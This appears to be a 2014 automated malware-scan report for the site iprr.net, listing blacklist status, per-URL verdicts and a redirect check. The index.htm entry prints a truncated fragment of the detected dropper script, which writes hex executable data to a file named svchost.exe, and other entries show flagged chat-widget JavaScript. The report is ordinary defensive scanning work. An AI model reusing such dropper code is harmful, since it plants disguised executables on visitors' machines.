Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iprr.net
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iprr.net/ | HTTP/1.1 200 OK Date: Thu, 17 Jul 2014 23:47:12 GMT Accept-Ranges: bytes ETag: "84fb475a6197cf1:1ec3" Server: Microsoft-IIS/6.0 Content-Length: 131002 Content-Location: http://iprr.net/index.htm Content-Type: text/html Last-Modified: Fri, 04 Jul 2014 08:24:19 GMT X-Powered-By: ASP.NET | clean |
http://iprr.net/index.htm | 200 OK Content-Length: 131002 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3620 bytes skipped]... Antivirus reports:
http://wpa.b.qq.com/cgi/wpa.php?key=XzgwMDAzODA2MF8yNTc1MF84MDAwMzgwNjBf | 200 OK Content-Length: 11358 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: www.iprr.net ...[3411 bytes skipped]... "gdtChat","link"];w(p,function(){q[this]=function(y){return function(){var z=arguments,A=u+y;var B=r("7818","21","1");v.one("api.define."+A,function(){B.addPoint("3").send();q[y].apply(q,z)});x(A)}}(this)})})})(window.BizQQWPA); BizQQWPA.set("srcPath", "/crm/wpa/release/3.3.3/"); BizQQWPA.setVersion("3.3.20140708").load({"wty":"1","kfuin":"800038060","nameAccount":"800038060","type":"1","sv":"4","title":"","aty":"0","a":"0","ws":"www.iprr.net","btn1":"\u8425\u9500QQ\u4ea4\u8c08","btn2":"","fsty":"0","fposX":"0","fposY":"0","csty":"1","tx":"1","wd":"","wd2":"","curl":"","wid":"","di":""}); | ||
http://wpa.b.qq.com/cgi/wpa.php?key=XzgwMDAzODA2MF8yNTc0OV84MDAwMzgwNjBf | 200 OK Content-Length: 11493 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: www.iprr.net ...[3301 bytes skipped]... ction(){q[this]=function(y){return function(){var z=arguments,A=u+y;var B=r("7818","21","1");v.one("api.define."+A,function(){B.addPoint("3").send();q[y].apply(q,z)});x(A)}}(this)})})})(window.BizQQWPA); BizQQWPA.set("srcPath", "/crm/wpa/release/3.3.3/"); BizQQWPA.setVersion("3.3.20140708").load({"wty":"1","kfuin":"800038060","nameAccount":"800038060","type":"12","sv":"4","title":"\u4f01\u4e1a\u540d\u79f0","aty":"0","a":"0","ws":"www.iprr.net","btn1":"\u8425\u9500QQ\u4ea4\u8c08","btn2":"\u4e0b\u6b21\u518d\u8bf4","fsty":"0","fposX":"2","fposY":"1","csty":"1","tx":"1","wd":"\u70b9\u51fb\u5373\u53ef\u53d1\u8d77\u4f1a\u8bdd","wd2":"ip\u6d41\u91cf\u63d0\u5347\u54a8\u8be2","curl":"","wid":"","di":""}); | ||
http://s95.cnzz.com/stat.php?id=1110398&web_id=1110398 | 200 OK Content-Length: 9321 Content-Type: application/javascript | clean |
http://shuatongji.iprr.net/stat.asp?id=22520 | 200 OK Content-Length: 650 Content-Type: text/html | clean |
http://shuatongji.iprr.net/test404page.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iprr.net
Result:
HTTP/1.1 200 OK
Date: Thu, 17 Jul 2014 23:47:12 GMT
Accept-Ranges: bytes
ETag: "84fb475a6197cf1:1ec3"
Server: Microsoft-IIS/6.0
Content-Length: 131002
Content-Location: http://iprr.net/index.htm
Content-Type: text/html
Last-Modified: Fri, 04 Jul 2014 08:24:19 GMT
X-Powered-By: ASP.NET
...131002 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iprr.net
Referer: http://www.google.com/search?q=iprr.net
Result:
The result is similar to the first query. There are no suspicious redirects found.